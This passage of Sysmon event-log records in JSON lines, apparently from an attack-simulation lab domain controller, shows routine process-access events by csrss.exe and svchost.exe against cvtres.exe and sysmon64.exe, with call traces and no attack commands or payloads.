C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0310-5F25-0000-0010929F0600}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4450,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4451,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4452,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4453,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4454,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4455,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4456,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4457,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 